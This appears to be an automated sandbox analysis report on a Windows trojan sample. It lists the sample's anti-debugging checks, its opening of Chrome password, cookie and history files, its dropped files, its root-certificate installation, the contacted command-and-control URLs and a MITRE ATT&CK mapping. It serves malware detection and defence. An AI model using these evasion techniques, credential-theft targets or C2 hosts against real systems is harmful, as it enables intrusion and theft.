MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 56BB1610C0318054.exe, 00000002.00000002.413280132.0000000002389000.00000004.00000001.sdmpBinary or memory string: 25-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: 56BB1610C0318054.exe, 00000002.00000003.387577851.0000000003D76000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000004.00000002.378670009.0000000002A09000.00000004.00000001.sdmpBinary or memory string: 25-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}#V
Source: 56BB1610C0318054.exe, 00000002.00000003.387787563.0000000003D61000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: C:\Users\user\AppData\Roaming\1611970637183.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_10019FF0
Hides threads from debuggersShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403E2C rdtsc 0_2_00403E2C
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A010 IsDebuggerPresent,0_2_1001A010
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00408D68
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00404E19 mov eax, dword ptr fs:[00000030h]0_2_00404E19
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h]0_2_10019DE0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E10 mov eax, dword ptr fs:[00000030h]0_2_10019E10
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E10 mov eax, dword ptr fs:[00000030h]0_2_10019E10
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]0_2_10019E70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]0_2_10019E70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]0_2_10019ED0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019DE0 mov eax, dword ptr fs:[00000030h]2_2_10019DE0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]2_2_10019E10
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]2_2_10019E10
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]2_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]2_2_10019ED0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000E90E GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,0_2_1000E90E
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,0_2_10015354
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,0_2_10015376
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_10018413
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000E44D
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,2_2_10015354
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,2_2_10015376
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,2_2_10018413
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1000E44D
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_1000EFFC
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099461F SetUnhandledExceptionFilter,18_2_0099461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00991C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00991C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_0099631F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0099373A
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,0_2_1001A0F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001779F cpuid 0_2_1001779F
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: GetLocaleInfoA,0_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: GetLocaleInfoA,2_2_10017CF0
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: GetLocaleInfoA,18_2_00997189
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,0_2_10019780
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10015254 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_10015254
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00401000 GetVersionExA,GetVersionExA,GetVersionExA,GetVersionExA,0_2_00401000
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistoryJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Input Capture1Peripheral Device Discovery11Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Browser Extensions1Process Injection11Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Bootkit1Logon Script (Mac)Install Root Certificate2NTDSSystem Information Discovery157Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsQuery Registry2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery561VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncVirtualization/Sandbox Evasion13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion13Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection11/etc/passwd and /etc/shadowRemote System Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Bootkit1Network SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 346134 Sample: Cyfj6XGbkd Startdate: 29/01/2021 Architecture: WINDOWS Score: 93 96 Malicious sample detected (through community Yara rule) 2->96 98 Multi AV Scanner detection for submitted file 2->98 100 Uses ping.exe to sleep 2->100 102 3 other signatures 2->102 8 Cyfj6XGbkd.exe 1 3 2->8         started        13 msiexec.exe 2->13         started        process3 dnsIp4 72 84cfba021a5a6662.xyz 104.21.23.16, 49725, 49729, 49730 CLOUDFLARENETUS United States 8->72 68 C:\Users\user\...\56BB1610C0318054.exe, PE32 8->68 dropped 70 C:\...\56BB1610C0318054.exe:Zone.Identifier, ASCII 8->70 dropped 104 Installs new ROOT certificates 8->104 106 Contains functionality to infect the boot sector 8->106 108 Registers a new ROOT certificate 8->108 110 4 other signatures 8->110 15 56BB1610C0318054.exe 26 8->15         started        20 56BB1610C0318054.exe 1 15 8->20         started        22 cmd.exe 1 8->22         started        24 msiexec.exe 4 8->24         started        file5 signatures6 process7 dnsIp8 76 84cfba021a5a6662.xyz 15->76 78 84CFBA021A5A6662.xyz 15->78 54 C:\Users\user\AppData\...\1611970637183.exe, PE32 15->54 dropped 56 C:\Users\user\AppData\Local\Temp\xldl.dll, PE32 15->56 dropped 58 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 15->58 dropped 66 7 other files (none is malicious) 15->66 dropped 84 Multi AV Scanner detection for dropped file 15->84 86 Detected unpacking (creates a PE file in dynamic memory) 15->86 88 Machine Learning detection for dropped file 15->88 94 3 other signatures 15->94 26 cmd.exe 15->26         started        29 1611970637183.exe 2 15->29         started        32 ThunderFW.exe 1 15->32         started        80 84cfba021a5a6662.xyz 20->80 60 C:\Users\user\AppData\...\Secure Preferences, UTF-8 20->60 dropped 62 C:\Users\user\AppData\Local\...\Preferences, ASCII 20->62 dropped 90 Tries to harvest and steal browser information (history, passwords, etc) 20->90 34 cmd.exe 1 20->34         started        36 cmd.exe 1 20->36         started        82 127.0.0.1 unknown unknown 22->82 92 Uses ping.exe to sleep 22->92 38 conhost.exe 22->38         started        40 PING.EXE 1 22->40         started        64 C:\Users\user\AppData\Local\...\MSIDCDD.tmp, PE32 24->64 dropped file9 signatures10 process11 dnsIp12 42 conhost.exe 26->42         started        44 PING.EXE 26->44         started        74 192.168.2.1 unknown unknown 29->74 112 Uses ping.exe to sleep 34->112 46 conhost.exe 34->46         started        48 PING.EXE 1 34->48         started        50 taskkill.exe 1 36->50         started        52 conhost.exe 36->52         started        signatures13 process14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Cyfj6XGbkd.exe40%VirustotalBrowse
Cyfj6XGbkd.exe24%MetadefenderBrowse
Cyfj6XGbkd.exe59%ReversingLabsWin32.Trojan.Phonzy
Cyfj6XGbkd.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe24%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe59%ReversingLabsWin32.Trojan.Phonzy
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSIDCDD.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe8%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe2%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\atl71.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_user.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\download_user.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\xldl.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
84CFBA021A5A6662.xyz1%VirustotalBrowse
84cfba021a5a6662.xyz1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://84cfba021a5a6662.xyz/info_old/g1%VirustotalBrowse
http://84cfba021a5a6662.xyz/info_old/g0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/e0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/w0%Avira URL Cloudsafe
https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
https://A5D4CE54CC78B3CA.xyz/0%Avira URL Cloudsafe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/r0%Avira URL Cloudsafe
https://twitter.comsec-fetch-dest:0%Avira URL Cloudsafe
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z0%Avira URL Cloudsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://84CFBA021A5A6662.xyz/al0%Avira URL Cloudsafe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
http://ocsp.pki.goog/GTSGIAG300%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/llr0%Avira URL Cloudsafe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/llH0%Avira URL Cloudsafe
http://www.youtube.comT0%Avira URL Cloudsafe
http://www.vb-cable.comVBCABLE0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://www.youtube.comf0%Avira URL Cloudsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=10%Avira URL Cloudsafe
http://www.vb-cable.com0%Avira URL Cloudsafe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js0%Avira URL Cloudsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://pki.goog/gsr2/GTSGIAG3.crt0)0%Avira URL Cloudsafe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt0#0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/info_old/ddd0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/info_old/wV0%Avira URL Cloudsafe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.0%Avira URL Cloudsafe
http://84cfba021a5a6662.xyz/info_old/wI0%Avira URL Cloudsafe
http://84CFBA021A5A6662.xyz/f0%Avira URL Cloudsafe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL0%Avira URL Cloudsafe
https://www.instagram.comsec-fetch-mode:0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
84CFBA021A5A6662.xyz
104.21.23.16
truefalseunknown
84cfba021a5a6662.xyz
104.21.23.16
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://84cfba021a5a6662.xyz/info_old/gfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://84cfba021a5a6662.xyz/info_old/efalse
  • Avira URL Cloud: safe
unknown
http://84cfba021a5a6662.xyz/info_old/wfalse
  • Avira URL Cloud: safe
unknown
http://84cfba021a5a6662.xyz/info_old/rfalse
  • Avira URL Cloud: safe
unknown
http://84CFBA021A5A6662.xyz/info_old/dddfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplateecvFEAD.tmp.9.drfalse
    		high
    https://duckduckgo.com/chrome_newtab56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drfalse
      		high
